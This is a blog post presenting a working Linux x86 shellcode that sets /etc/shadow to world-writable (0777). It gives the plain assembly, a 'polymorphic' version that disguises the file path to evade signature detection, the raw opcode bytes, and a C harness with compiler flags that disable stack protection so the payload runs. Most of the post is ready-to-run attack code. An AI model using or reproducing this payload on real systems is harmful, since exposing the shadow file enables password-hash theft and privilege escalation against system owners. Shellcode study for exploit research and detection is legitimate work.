Chmod 0777 Polymorphic Shellcode

This is my first hand written shellcode for linux which I wrote it for fun and exploration. I am a bit new to shellcoding in *nix environments. This shellcode changes the permission of the shadow file in linux/x86 system to 0777. According to the Linux programmer’s manual of chmod it takes two arguments.

#include <sys/stat.h>

int chmod(const char *path, mode_t mode);

The char pointer path needs to be our path to the file and the mode needs is our file permissions. We need to calculate it by ORing the permissions. Since we need to set it to 0777 which is the octal value, the hexadecimal value is 1FF. This is my original assembly code. According to the x86 syscall table the value for chmod is 15.

section .text
        global _start

_start:
        xor eax,eax
        push dword eax
        push dword 0x776f6461
        push dword 0x68732f63
        push dword 0x74652f2f
        mov ebx, esp
        push word  0x1ff
        pop cx
        mov al,0xf
        int 0x80

This is my polymorphic version in which I have changed the original code retaining the functionality.

; Title:    chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date:     2014-06-22
; Author:   Osanda Malith Jayathissa (@OsandaMalith)

section .text
        global _start

_start: 
        mov ebx, eax
        xor eax, ebx
        push dword eax
        mov esi, 0x563a1f3e
        add esi, 0x21354523
        mov dword [esp-4], esi
        mov dword [esp-8], 0x68732f2f
        mov dword [esp-12], 0x6374652f
        sub esp, 12
        mov    ebx,esp
        push word  0x1ff
        pop    cx
        mov    al,0xf
        int    0x80

 

This is the C skeleton file in which you can test. Compile giving -fno-stack-protector and -z execstack arguments to gcc to make it execute.

/*
; Title:    chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date:     2014-06-22
; Author:   Osanda Malith Jayathissa (@OsandaMalith)

section .text
  global _start

_start:  
  mov ebx, eax
  xor eax, ebx
  push dword eax
  mov esi, 0x563a1f3e
  add esi, 0x21354523
  mov dword [esp-4], esi
  mov dword [esp-8], 0x68732f2f
  mov dword [esp-12], 0x6374652f
  sub esp, 12
  mov    ebx,esp
  push word  0x1ff
  pop    cx
  mov    al,0xf
  int    0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";

int
main() {

        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
  
  return 0;
}

http://packetstormsecurity.com/files/127180/Linux-x86-chmod-0777-etc-shadow-Polymorphic-Shellcode.html

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s